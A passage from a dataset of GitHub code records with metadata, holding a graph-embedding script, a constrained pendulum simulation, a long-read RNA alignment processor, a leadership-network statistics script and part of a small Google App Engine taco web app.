alpha2=0, Net=CombX2, beta=0, num_paths=number_walks, path_length=walk_length, dim=d, win_size=win_size).function()\nprint(\"time elapsed: {:.2f}s\".format(time.time() - start_time))\n\n'''################# FeatWalk for a single feature matrix #################'''\nprint(\"FeatWalk for a single feature matrix:\")\nstart_time = time.time()\nH_FeatWalk_X = featurewalk(featur1=CombX1, alpha1=1, featur2=None, alpha2=0, Net=None, beta=0, num_paths=number_walks, path_length=walk_length, dim=d, win_size=win_size).function()\nprint(\"time elapsed: {:.2f}s\".format(time.time() - start_time))\n\nsio.savemat('Embedding.mat', {\"H_FeatWalk\": H_FeatWalk, \"H_FeatWalk_X\": H_FeatWalk_X})", "repo_name": "DEEP-PolyU/FeatWalk_AAAI19", "sub_path": "Runme.py", "file_name": "Runme.py", "file_ext": "py", "file_size_in_byte": 2102, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "31", "api": [{"api_name": "scipy.io.loadmat", "line_number": 7, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 7, "usage_type": "name"}, {"api_name": "numpy.random.randint", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 19, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 34, "usage_type": "call"}, {"api_name": "FeatWalk.featurewalk", "line_number": 35, "usage_type": "call"}, {"api_name": "time.time", "line_number": 36, "usage_type": "call"}, {"api_name": "time.time", "line_number": 40, "usage_type": "call"}, {"api_name": "FeatWalk.featurewalk", "line_number": 41, "usage_type": "call"}, {"api_name": "time.time", "line_number": 42, "usage_type": "call"}, {"api_name": "scipy.io.savemat", "line_number": 44, "usage_type": "call"}, {"api_name": "scipy.io", "line_number": 44, "usage_type": "name"}]}
+{"seq_id": "33201543562", "text": "from sympy import *\r\nfrom scipy import sparse\r\nfrom numpy import empty\r\nfrom scipy.sparse.linalg import dsolve\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport scipy.integrate as integrate\r\nimport matplotlib.animation as animation\r\nimport time\r\n\r\n\r\ndef phi(xi, yi, di):\r\n\r\n return Matrix([xi**2+yi**2-di**2])\r\n\r\n\r\ndef cm_rhs(ci, bi, xi):\r\n\r\n \"\"\"Coefficient Matrix Right Hand Side: The function takes the coefficient\r\n matrix of the Lagrangian equations of motion of first kind, the second\r\n time derivative of the geometrical constraints, and the vectors of the\r\n unknowns. It provides the coefficient matrix of the linear algebraic\r\n equation system, and the right hand side of the equation.\"\"\"\r\n\r\n z = zeros(ci.shape[0], ci.shape[1]) #Makes zeros matrix of the same shape as the coefficient matrix\r\n n_b = zeros(bi.shape[0], bi.shape[1]) # Makes zeros matrix(column vector) as the right hand side\r\n s = 0\r\n for i, bi_val in enumerate(bi):\r\n for j, xi_val in enumerate(xi):\r\n z[-bi.shape[0]+i, j] = bi_val.coeff(xi_val)\r\n s += bi_val.coeff(xi_val)*xi_val\r\n n_b[i] = bi_val - s\r\n s = 0\r\n\r\n return ci - z, n_b\r\n\r\n\r\ndef n_sys_eq(ai, bi, ri, ri_t, r0i, r0i_t):\r\n\r\n \"\"\"The function replaces the symbolic variables with their numerical\r\n values and returns with sparse matrices.\"\"\"\r\n\r\n for j in range(len(ri)):\r\n ai = ai.subs(ri_t[j], r0i_t[j])\r\n ai = ai.subs(ri[j], r0i[j])\r\n bi = bi.subs(ri_t[j], r0i_t[j])\r\n bi = bi.subs(ri[j], r0i[j])\r\n return matrix2sparse(N(ai)), matrix2sparse(N(bi))\r\n\r\n\r\ndef st_space(ri, ri_t):\r\n\r\n \"\"\"The function interweaves the position and velocity vectors into a\r\n state space vector\"\"\"\r\n\r\n w = zeros(2*len(ri), 1)\r\n for i in range(len(w)):\r\n if i % 2 is 0:\r\n w[i] = ri[int(i/2)]\r\n else:\r\n w[i] = ri_t[int((i-1)/2)]\r\n return w\r\n\r\n\r\ndef cauchy_form(ai, bi, ri_t):\r\n\r\n \"\"\"The function rewrites the differential equation system into its\r\n Cauchy-form\"\"\"\r\n\r\n eye_m = eye(len(ri_t))\r\n z_m = zeros(ai.shape[0], len(ri_t))\r\n coeff_m = eye_m.row_join(zeros(len(ri_t), ai.shape[1]))\r\n a_c = coeff_m.col_join(z_m.row_join(ai))\r\n b_c = ri_t.col_join(bi)\r\n return a_c, b_c\r\n\r\n\r\ndef sys_rk4(ai, qi, r, r_t, ic, ic_t, h):\r\n\r\n nai, nqi = n_sys_eq(ai, qi, r, r_t, ic, ic_t)\r\n\r\n len_ict = len(ic_t)\r\n len_ic = len(ic)\r\n xi_1 = dsolve.spsolve(nai, nqi, use_umfpack=False)\r\n lbd = xi_1[len_ic+len_ict:]\r\n k_1 = h*xi_1\r\n\r\n ictk_1 = ic_t + 0.5 * k_1[len_ict:len_ic + len_ict]\r\n ick_1 = ic + 0.5*k_1[0:len_ict]\r\n nai_2, nqi_2 = n_sys_eq(ai, qi, r, r_t, ick_1, ictk_1)\r\n xi_2 = dsolve.spsolve(nai_2, nqi_2, use_umfpack=False)\r\n k_2 = h*xi_2\r\n\r\n ictk_2 = ic_t + 0.5 * k_2[len_ict:len_ic + len_ict]\r\n ick_2 = ic + 0.5 * k_2[0:len_ict]\r\n nai_3, nqi_3 = n_sys_eq(ai, qi, r, r_t, ick_2, ictk_2)\r\n xi_3 = dsolve.spsolve(nai_3, nqi_3, use_umfpack=False)\r\n k_3 = h*xi_3\r\n\r\n ictk_3 = ic_t + k_3[len_ict:len_ic + len_ict]\r\n ick_3 = ic + k_3[0:len_ict]\r\n nai_4, nqi_4 = n_sys_eq(ai, qi, r, r_t, ick_3, ictk_3)\r\n xi_4 = dsolve.spsolve(nai_4, nqi_4, use_umfpack=False)\r\n k_4 = h*xi_4\r\n\r\n y_sol = ic + (k_1[0:len_ict] + 2*(k_2[0:len_ict] + k_3[0:len_ict]) +\r\n k_4[0:len_ict])/6\r\n\r\n yt_sol = ic_t + (k_1[len_ict:len_ic + len_ict] +\r\n 2*(k_2[len_ict:len_ic + len_ict] +\r\n k_3[len_ict:len_ic + len_ict]) +\r\n k_4[len_ict:len_ic + 
len_ict])/6\r\n lbd_sol = lbd + (k_1[len_ic+len_ict:] + 2*(k_2[len_ic+len_ict:] +\r\n k_3[len_ic+len_ict:]) +\r\n k_4[len_ic+len_ict:])/6\r\n return y_sol, yt_sol, lbd_sol\r\n\r\n\r\ndef matrix2sparse(mi):\r\n \"\"\"Converts SymPy's matrix to a SciPy sparse matrix.\"\"\"\r\n a = empty(mi.shape, dtype=float)\r\n for i in range(mi.rows):\r\n for j in range(mi.cols):\r\n a[i, j] = mi[i, j]\r\n return sparse.csr_matrix(a)\r\n\r\n\r\nt = Symbol('t')\r\nlbd = Symbol('lbd')\r\nx = Function('x')(t)\r\ny = Function('y')(t)\r\nm = 1\r\ng = -9.81\r\nd_l = 2\r\nalpha = 10\r\nh = 0.01\r\nR = 0.5\r\nbeta = 10\r\n\r\nphi_r = Matrix([phi(x, y, d_l).diff(x), phi(x, y, d_l).diff(y)])\r\nphi_t = Matrix([phi(x, y, d_l).diff(t)])\r\nunknowns = Matrix([x.diff(t, t), y.diff(t, t), lbd])\r\nr = Matrix([x, y])\r\nr_t = r.diff(t)\r\n\r\nM = Matrix([[m, 0], [0, m]])\r\nF = Matrix([0, m*g])\r\nb = Matrix([- (phi_r.diff(t)).T*r.diff(t) - phi_t.diff(t) -\r\n 2*alpha*(phi_r.T*r.diff(t) + phi_t) -\r\n (beta**2)*phi(x, y, d_l)])\r\nZ = zeros(phi_r.shape[1])\r\nA = M.row_join(phi_r).col_join(phi_r.T.row_join(Z))\r\n\r\nC, Nb = cm_rhs(A, b, unknowns)\r\nQ = F.col_join(Nb)\r\n\r\nC_c, Q_c = cauchy_form(C, Q, r_t)\r\n\r\nsimulation_time = 4\r\nsteps = int(simulation_time/h)\r\nic = [N(sqrt(2)/2), -N(sqrt(2)/2)]\r\nic_t = [0, 0]\r\n\r\ny = [None]*int(steps)\r\ny_t = [None]*int(steps)\r\nt = [None]*int(steps)\r\n\r\ny[0] = ic\r\ny_t[0] = ic_t\r\nt[0] = 0\r\nstart = time.clock()\r\ny_test = sys_rk4(C_c, Q_c, r, r_t, y[0], y_t[0], h)[0]\r\nend = time.clock()\r\n#for i in range(steps-1):\r\n# y[i+1] = sys_rk4(C_c, Q_c, r, r_t, y[i], y_t[i], h)[0]\r\n# y_t[i+1] = sys_rk4(C_c, Q_c, r, r_t, y[i], y_t[i], h)[1]\r\n# t[i+1] = i*h\r\n\r\nfig = plt.figure()\r\nax = fig.add_subplot(111, autoscale_on=False, projection='3d')\r\nplt.gca().set_aspect('equal', adjustable='box')\r\nax.grid()\r\nax.set_xlim3d(-1.5, 1.5)\r\nax.set_ylim3d(-1.5, 1.5)\r\nax.set_zlim3d(-1.5, 1.5)\r\nax.view_init(30,60)\r\n\r\nline, = ax.plot([], [], [], 'o-', lw=2)\r\n\r\nx1 = [None]*int(steps)\r\ny1 = [None]*int(steps)\r\nz1 = [0]*int(steps)\r\n\r\nfor i in range(len(y)):\r\n x1[i] = y[i][0]\r\n y1[i] = y[i][1]\r\n\r\n\r\ndef init():\r\n\r\n line.set_data([], [])\r\n line.set_3d_properties([])\r\n return line,\r\n\r\n\r\ndef animate(i):\r\n\r\n thisx = [0, x1[i]]\r\n thisy = [0, y1[i]]\r\n thisz = [0, z1[i]]\r\n\r\n\r\n line.set_data(thisx, thisz)\r\n line.set_3d_properties(thisy)\r\n\r\n return line,\r\n\r\nani = animation.FuncAnimation(fig, animate, np.arange(1, len(y)),\r\n interval=25, blit=True, init_func=init)\r\n\r\nplt.show()\r\n", "repo_name": "kungergely92/RBD", "sub_path": "Main.py", "file_name": "Main.py", "file_ext": "py", "file_size_in_byte": 6173, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "scipy.sparse.linalg.dsolve.spsolve", "line_number": 86, "usage_type": "call"}, {"api_name": "scipy.sparse.linalg.dsolve", "line_number": 86, "usage_type": "name"}, {"api_name": "scipy.sparse.linalg.dsolve.spsolve", "line_number": 93, "usage_type": "call"}, {"api_name": "scipy.sparse.linalg.dsolve", "line_number": 93, "usage_type": "name"}, {"api_name": "scipy.sparse.linalg.dsolve.spsolve", "line_number": 99, "usage_type": "call"}, {"api_name": "scipy.sparse.linalg.dsolve", "line_number": 99, "usage_type": "name"}, {"api_name": "scipy.sparse.linalg.dsolve.spsolve", "line_number": 105, "usage_type": "call"}, {"api_name": "scipy.sparse.linalg.dsolve", "line_number": 105, 
"usage_type": "name"}, {"api_name": "numpy.empty", "line_number": 123, "usage_type": "call"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 127, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 127, "usage_type": "name"}, {"api_name": "time.clock", "line_number": 173, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 175, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "matplotlib.animation.FuncAnimation", "line_number": 220, "usage_type": "call"}, {"api_name": "matplotlib.animation", "line_number": 220, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 220, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}]}
+{"seq_id": "12835284651", "text": "import logging\nimport pysam\nfrom Bio import SeqIO\n\nfrom src.long_read_assigner import *\nfrom src.long_read_simple_assigner import *\n\nfrom src.long_read_profiles import *\nfrom src.polya_finder import *\nfrom src.polya_verification import *\n\nlogger = logging.getLogger('CSA')\n\n\nclass LongReadSimpleAlignmentProcessor:\n \"\"\" class for aggregating all assignment information\n\n Parameters\n ----------\n gene_info\n bams\n params\n printer\n counter\n \"\"\"\n\n def __init__(self, gene_info, bams, params, chr_record=None):\n self.gene_info = gene_info\n self.bams = bams\n self.params = params\n self.chr_record = chr_record\n\n self.assigner = LongReadSimpleAssigner(self.gene_info, self.params)\n self.profile_constructor = CombinedProfileConstructor(gene_info, params)\n self.polya_finder = PolyAFinder(self.params.polya_window, self.params.polya_fraction)\n self.polya_fixer = PolyAFixer(self.params)\n self.assignment_storage = []\n self.gene_region = (gene_info.start, gene_info.end)\n\n def process(self, intron_printer):\n self.assignment_storage = []\n self.gene_info.all_read_region_start = self.gene_info.start\n self.gene_info.all_read_region_end = self.gene_info.end\n\n for b in self.bams:\n self.process_single_file(b, intron_printer)\n\n if self.params.needs_reference:\n self.gene_info.all_read_region_start -= self.params.upstream_region_len\n self.gene_info.all_read_region_end += self.params.upstream_region_len\n self.gene_info.reference_region = \\\n str(self.chr_record[self.gene_info.all_read_region_start - 1:self.gene_info.all_read_region_end + 1].seq)\n self.gene_info.canonical_sites = {}\n return self.assignment_storage\n\n def process_single_file(self, bamfile_in, intron_printer):\n processed_reads = set()\n for genic_region in self.gene_info.genic_regions:\n for alignment in bamfile_in.fetch(self.gene_info.chr_id, genic_region[0], genic_region[1]):\n read_id = alignment.query_name\n if alignment.reference_id == -1:\n self.assignment_storage.append(ReadAssignment(read_id, None))\n continue\n if alignment.is_supplementary:\n continue\n if self.params.no_secondary and alignment.is_secondary:\n continue\n\n logger.debug(\"=== Processing read \" + read_id + \" ===\")\n\n # concat indels\n concat_blocks = concat_gapless_blocks(sorted(alignment.get_blocks()), alignment.cigartuples)\n if not concat_blocks:\n logger.warning(\"Read %s has no aligned exons\" % read_id)\n continue\n # correct coordinates to GTF style (inclusive intervals)\n sorted_blocks = correct_bam_coords(concat_blocks)\n read_start = sorted_blocks[0][0]\n read_end = sorted_blocks[-1][1]\n read_tuple = (read_id, read_start, read_end)\n if read_tuple in processed_reads:\n continue\n processed_reads.add(read_tuple)\n logger.debug(\"Read exons: \" + str(sorted_blocks))\n if self.params.needs_reference:\n if read_start < self.gene_info.all_read_region_start:\n self.gene_info.all_read_region_start = read_start\n if read_end > self.gene_info.all_read_region_end:\n self.gene_info.all_read_region_end = read_end\n\n #polya_info = self.polya_finder.detect_polya(alignment)\n #sorted_blocks, polya_info, exon_changed = self.polya_fixer.correct_read_info(sorted_blocks, polya_info)\n polya_info = PolyAInfo(-1, -1, -1, -1)\n\n combined_profile = self.profile_constructor.construct_profiles(sorted_blocks, polya_info)\n read_assignment = self.assigner.assign_to_isoform(read_id, combined_profile)\n\n #if exon_changed:\n # 
read_assignment.add_match_attribute(MatchEvent(MatchEventSubtype.aligned_polya_tail))\n read_assignment.polyA_found = (polya_info.external_polya_pos != -1 or\n polya_info.external_polyt_pos != -1 or\n polya_info.internal_polya_pos != -1 or\n polya_info.internal_polyt_pos != -1)\n read_assignment.polya_info = polya_info\n read_assignment.exons = sorted_blocks\n read_assignment.mapped_strand = \"-\" if alignment.is_reverse else \"+\"\n read_assignment.chr_id = self.gene_info.chr_id\n read_assignment.multimapper = alignment.is_secondary\n\n if intron_printer and self.chr_record and not alignment.is_secondary:\n chr_id = self.gene_info.chr_id\n read_start = sorted_blocks[0][0] - 10\n read_end = sorted_blocks[-1][1] + 10\n ref_region = str(self.chr_record[read_start - 1:read_end + 1].seq)\n gene_profile_index = 0\n gene_profile = combined_profile.read_intron_profile.gene_profile\n\n for i, intron in enumerate(combined_profile.read_intron_profile.read_features):\n if combined_profile.read_intron_profile.read_profile[i] != 1:\n intron_printer.add_intron_info(read_id, chr_id, \".\", intron, (0, 0), \"novel\", 0, 0, 0, 0, 0,\n 0)\n continue\n\n while gene_profile_index < len(gene_profile) and (\n gene_profile[gene_profile_index] != 1 or not overlaps(intron,\n self.gene_info.intron_profiles.features[\n gene_profile_index])):\n gene_profile_index += 1\n if gene_profile_index >= len(gene_profile) or gene_profile[gene_profile_index] != 1:\n logger.info(\"profile %s, index %d\" % (str(gene_profile), gene_profile_index))\n logger.info(\"read profile %s, index %d\" % (\n str(combined_profile.read_intron_profile.read_profile), i))\n\n reference_intron = self.gene_info.intron_profiles.features[gene_profile_index]\n gene_profile_index += 1\n is_consistent = reference_intron == intron\n left_diff = intron[0] - reference_intron[0]\n right_diff = intron[1] - reference_intron[1]\n\n ref_strand = self.check_canonical(reference_intron, ref_region, read_start)\n read_strand = self.check_canonical(intron, ref_region, read_start)\n if ref_strand is None:\n # reference intron is non-canonical\n if read_strand is None:\n # read intron is non-canonical as well\n intron_printer.add_intron_info(read_id, chr_id, \".\", intron, reference_intron,\n \"both_noncanonical\", 0, 0, 0, 0, left_diff, right_diff)\n else:\n # read is canonical\n strand, donor_up, donor_down, acceptor_up, acceptor_down = \\\n self.analyse_intron_sites(intron, ref_region, read_start, read_strand)\n if read_strand == '+':\n donor_diff = left_diff\n acc_diff = right_diff\n else:\n donor_diff = - right_diff\n acc_diff = - left_diff\n intron_printer.add_intron_info(read_id, chr_id, read_strand, intron, reference_intron,\n \"reference_noncanonical\",\n donor_up, donor_down, acceptor_up,\n acceptor_down, donor_diff, acc_diff)\n else:\n strand, donor_up, donor_down, acceptor_up, acceptor_down = \\\n self.analyse_intron_sites(intron, ref_region, read_start, ref_strand)\n if ref_strand == '+':\n donor_diff = left_diff\n acc_diff = right_diff\n else:\n donor_diff = - right_diff\n acc_diff = - left_diff\n if ref_strand != read_strand:\n intron_printer.add_intron_info(read_id, chr_id, ref_strand, intron, reference_intron,\n \"read_noncanonical\",\n donor_up, donor_down, acceptor_up,\n acceptor_down, donor_diff, acc_diff)\n else:\n intron_type = \"consistent\" if is_consistent else \"incosistent\"\n intron_printer.add_intron_info(read_id, chr_id, strand, intron, reference_intron,\n intron_type,\n donor_up, donor_down, acceptor_up, acceptor_down,\n donor_diff, 
acc_diff)\n\n if self.params.sqanti_output:\n indel_count, junctions_with_indels = self.count_indel_stats(alignment)\n read_assignment.set_additional_info(\"indel_count\", indel_count)\n read_assignment.set_additional_info(\"junctions_with_indels\", junctions_with_indels)\n read_assignment.introns_match = \\\n all(e == 1 for e in combined_profile.read_intron_profile.read_profile)\n\n self.assignment_storage.append(read_assignment)\n logger.debug(\"=== Finished read \" + read_id + \" ===\")\n\n def check_canonical(self, intron, ref_region, read_start, strand=None):\n intron_left_pos = intron[0] - read_start\n intron_right_pos = intron[1] - read_start\n left_site = ref_region[intron_left_pos:intron_left_pos + 2]\n right_site = ref_region[intron_right_pos - 1:intron_right_pos + 1]\n if (left_site == \"GT\" and right_site == \"AG\") and strand != '-':\n return '+'\n elif (left_site == \"CT\" and right_site == \"AC\") and strand != '+':\n return '-'\n else:\n return None\n\n def analyse_intron_sites(self, intron, ref_region, read_start, strand=None):\n seq_size = 10\n intron_left_pos = intron[0] - read_start\n intron_right_pos = intron[1] - read_start\n\n if strand is None:\n left_site = ref_region[intron_left_pos:intron_left_pos + 2]\n right_site = ref_region[intron_right_pos - 1:intron_right_pos + 1]\n if left_site == \"GT\" and right_site == \"AG\":\n strand = '+'\n elif left_site == \"CT\" and right_site == \"AC\":\n strand = '-'\n else:\n return None, None, None, None, None\n\n if strand not in ['+', '-']:\n return None, None, None, None, None\n\n left_upper = ref_region[intron_left_pos - seq_size:intron_left_pos]\n left_lower = ref_region[intron_left_pos + 2:intron_left_pos + seq_size + 2]\n right_upper = ref_region[intron_right_pos - seq_size - 1:intron_right_pos - 1]\n right_lower = ref_region[intron_right_pos + 1:intron_right_pos + seq_size + 1]\n\n # upstream and downstream here are relative to the genome\n if strand == \"+\":\n donor_upstream = left_upper.rfind(\"GT\")\n donor_downstream = left_lower.find(\"GT\")\n acc_upstream = right_upper.rfind(\"AG\")\n acc_downstream = right_lower.find(\"AG\")\n else:\n acc_upstream = left_upper.rfind(\"CT\")\n acc_downstream = left_lower.find(\"CT\")\n donor_upstream = right_upper.rfind(\"AC\")\n donor_downstream = right_lower.find(\"AC\")\n\n donor_upstream = seq_size - donor_upstream if donor_upstream != -1 else 0\n donor_downstream = 2 + donor_downstream if donor_downstream != -1 else 0\n acc_upstream = seq_size - acc_upstream if acc_upstream != -1 else 0\n acc_downstream = 2 + acc_downstream if acc_downstream != -1 else 0\n\n if strand == '+':\n return strand, donor_upstream, donor_downstream, acc_upstream, acc_downstream\n else:\n return strand, donor_downstream, donor_upstream, acc_downstream, acc_upstream\n\n def count_indel_stats(self, alignment):\n cigar_event_count = len(alignment.cigartuples)\n indel_events = [1, 2]\n indel_count = 0\n intron_cigar_positions = []\n for i in range(cigar_event_count):\n cigar = alignment.cigartuples[i]\n if cigar[0] in indel_events:\n indel_count += 1\n elif cigar[0] == 3:\n intron_cigar_positions.append(i)\n\n junctions_with_indels = 0\n for i in intron_cigar_positions:\n # indel right near intron\n if (i > 0 and alignment.cigartuples[i - 1][0] in indel_events) or \\\n (i < cigar_event_count - 1 and alignment.cigartuples[i + 1][0] in indel_events):\n junctions_with_indels += 1\n\n # indel separated by at most 'indel_near_splice_site_dist' matches from intron\n if (i > 1 and alignment.cigartuples[i - 
2][0] in indel_events and\n alignment.cigartuples[i - 1][0] in [0, 7, 8] and\n alignment.cigartuples[i - 1][1] <= self.params.indel_near_splice_site_dist) or \\\n (i < cigar_event_count - 2 and alignment.cigartuples[i + 2][0] in indel_events and\n alignment.cigartuples[i + 1][0] in [0, 7, 8] and\n alignment.cigartuples[i + 1][1] <= self.params.indel_near_splice_site_dist):\n junctions_with_indels += 1\n\n return indel_count, junctions_with_indels\n", "repo_name": "ablab/platform_comparison", "sub_path": "src/alignment_processor_simple.py", "file_name": "alignment_processor_simple.py", "file_ext": "py", "file_size_in_byte": 14892, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}]}
+{"seq_id": "44046222161", "text": "import pandas as pd\nimport argparse\nimport os\nimport networkx as nx\nfrom collections import Counter\nfrom scipy.stats import binom_test\nfrom helpful_functions import source_names\n\ndef readArgs ():\n\tparser = argparse.ArgumentParser (description=\"statistics about semantic leaders\")\n\tparser.add_argument (\"--src-path\", required=True, type=str, help=\"directory contains the leadership scores\")\n\tparser.add_argument (\"--leaders-file\", required=True, type=str, help=\"file contains the leaders and their scores\")\n\tparser.add_argument (\"--leader-stats-file\", required=True, type=str, help=\"output file should contain aggregated leadership stats\")\n\tparser.add_argument (\"--leader-follower-stats-file\", required=True, type=str, help=\"output file should contain aggregated leadership/followee stats\")\n\targs = parser.parse_args ()\n\treturn args\n\ndef create_net (source_names, dyads_counter):\n\tG = nx.DiGraph ()\n\n\tG.add_nodes_from(source_names)\n\tn_edges = sum([dyads_counter[item] for item in dyads_counter])\n\tfor item in dyads_counter:\n\t\t# edge should point from follower to leader\n\t\tG.add_edge(item[1], item[0], weight=dyads_counter[item]/n_edges)\n\treturn G\n\ndef main (args):\n\tdf = pd.read_csv(os.path.join (args.src_path, args.leaders_file), sep=\";\")\n\trows = df[[\"s1\", \"s2\"]].values.tolist()\n\tpairs = list ()\n\tfor row in rows:\n\t\ts1, s2 = row[0], row[1]\n\t\tpairs.append ((s1, s2))\n\n\tleaders_followers = Counter (pairs)\n\n\tG = create_net (source_names, leaders_followers)\n\tpagerank = nx.pagerank_numpy (G, alpha=0.85)\n\t# include also a personalization factor\n\t\n\tleaders = Counter([x1 for x1, x2 in pairs])\n\tfollowers = Counter ([x2 for x1, x2 in pairs])\n\t\n\t# calculate the leader follower stats\n\titems = list ()\n\ttotal_dyads = sum([item[1] for item in leaders_followers.most_common (None)])\n\tfor item in leaders_followers.most_common (None):\n\t\titems.append ([item[0][0], item[0][1], item[1], item[1]/total_dyads])\n\n\tleaders_followers_df = pd.DataFrame (items, columns=[\"Leader\", \"Follower\", \"Count\", \"Probability\"])\n\n\t# calculate the leader stats\n\titems = list ()\n\tepsilon = 1e-10\n\tfor name in sorted (source_names):\n\t\tleader_prob = leaders[name]/(leaders[name] + followers[name] + epsilon)\n\t\tfollower_prob = followers[name]/(leaders[name] + followers[name] + epsilon)\n\t\tpval = binom_test([leaders[name], followers[name]], alternative=\"greater\")\n\t\tpr = pagerank[name]\n\t\titems.append ([name, leaders[name], f\"{leader_prob:.4f}\", f\"{pval:.4f}\", followers[name], f\"{follower_prob:.4f}\", f\"{pr:.4f}\"])\n\n\tleaders_df = pd.DataFrame (items, columns=[\"Name\", \"Count(role as leader)\", \"P(Name=leader)\", \"Pval\", \"Count(role as follower)\", \"P(Name=follower)\", \"PageRank\"])\n\n\t## Write to files\n\tleaders_followers_df.to_csv (os.path.join (args.src_path, args.leader_follower_stats_file), sep=\",\", index=False, header=True)\t\t\n\tleaders_df.to_csv (os.path.join (args.src_path, args.leader_stats_file), sep=\",\", index=False, header=True)\n\nif __name__ == \"__main__\":\n\tmain (readArgs())\n", "repo_name": "sandeepsoni/semantic-leadership-network", "sub_path": "scripts/leadership_stats.py", "file_name": "leadership_stats.py", "file_ext": "py", "file_size_in_byte": 2953, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "31", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": 
"call"}, {"api_name": "networkx.DiGraph", "line_number": 19, "usage_type": "call"}, {"api_name": "helpful_functions.source_names", "line_number": 21, "usage_type": "argument"}, {"api_name": "pandas.read_csv", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "collections.Counter", "line_number": 36, "usage_type": "call"}, {"api_name": "helpful_functions.source_names", "line_number": 38, "usage_type": "argument"}, {"api_name": "networkx.pagerank_numpy", "line_number": 39, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 42, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 43, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 51, "usage_type": "call"}, {"api_name": "helpful_functions.source_names", "line_number": 56, "usage_type": "argument"}, {"api_name": "scipy.stats.binom_test", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}]}
+{"seq_id": "46302704277", "text": "import webapp2\nimport os\nimport random\nimport jinja2\n#import taco_model\n\nfrom google.appengine.ext import ndb\n\n\nclass TacoFillingModel(ndb.Model):\n #list here all the properties of the entity\n tacoIn = ndb.StringProperty(required=True)\n\n\n\ndef get_bill():\n # Add a list of fortunes to the empty fortune_list array\n bill_list=[10, 15.5, 20, 25.5, 30]\n # Use the random library to return a random element from the array\n random_bill = random.choice(bill_list)\n return random_bill\n\ndef get_tacos():\n # Add a list of fortunes to the empty fortune_list array\n filling_list = get_all_tacos()\n # Use the random library to return a random element from the array\n if len(filling_list) == 0:\n random_filling = 'test-filling'\n else:\n random_filling = random.choice(filling_list)\n return random_filling\n\ndef get_all_tacos():\n #fillings = ['steak', 'carnitas', 'veggie', 'chicken', 'ground beef']\n fillings = TacoFillingModel.query().filter().fetch()\n only_fillings = []\n for fil in fillings:\n only_fillings.append(str(fil.tacoIn))\n return only_fillings\n\n# Remember, you can get this by searching for jinja2 google app engine\njinja_current_directory = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),\n extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\n\nclass TacosHandler(webapp2.RequestHandler):\n def get(self):\n results_template = jinja_current_directory.get_template('template/tacos_results.html')\n self.response.write(results_template.render(tacoType = get_tacos()))\n\n #this gets executed when you use a form with POST method and /tacos route\n def post(self):\n # get input from the html form\n new_filling_from_form = self.request.get('new-filling')\n tacoFilling1 = TacoFillingModel( tacoIn = new_filling_from_form)\n k = tacoFilling1.put()\n results_template = jinja_current_directory.get_template('template/add_taco.html')\n self.response.write(results_template.render(filling = k.get().tacoIn))\n\n\nclass BillHandler(webapp2.RequestHandler):\n def get(self):\n results_template = jinja_current_directory.get_template('template/bill_results.html')\n self.response.write(results_template.render(total = str(get_bill())))\n\n # def post(self):\n\n\nclass WelcomeHandler(webapp2.RequestHandler):\n def get(self):\n results_template = jinja_current_directory.get_template('template/welcome.html')\n self.response.write(results_template.render())\n\n\nclass AllFillingsHandler(webapp2.RequestHandler):\n def get(self):\n #results_template = jinja_current_directory.get_template('template/welcome.html')\n #self.response.write(results_template.render())\n self.response.write(get_all_tacos())\n\n# Route mapping\napp = webapp2.WSGIApplication([\n # This line routes the main url ('/') - also know as\n # The root route - to the Fortune Handler\n ('/', WelcomeHandler),\n ('/tacos', TacosHandler), #maps '/predict' to the TacosHandler\n ('/bill', BillHandler), #maps '/farewell' to the BillHandler\n ('/fillings', AllFillingsHandler),\n], debug=True)\n", "repo_name": "marianelamin/mvc-restaurant-only-tacos", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3169, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "google.appengine.ext.ndb.Model", "line_number": 10, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.ndb", "line_number": 10, "usage_type": "name"}, {"api_name": 
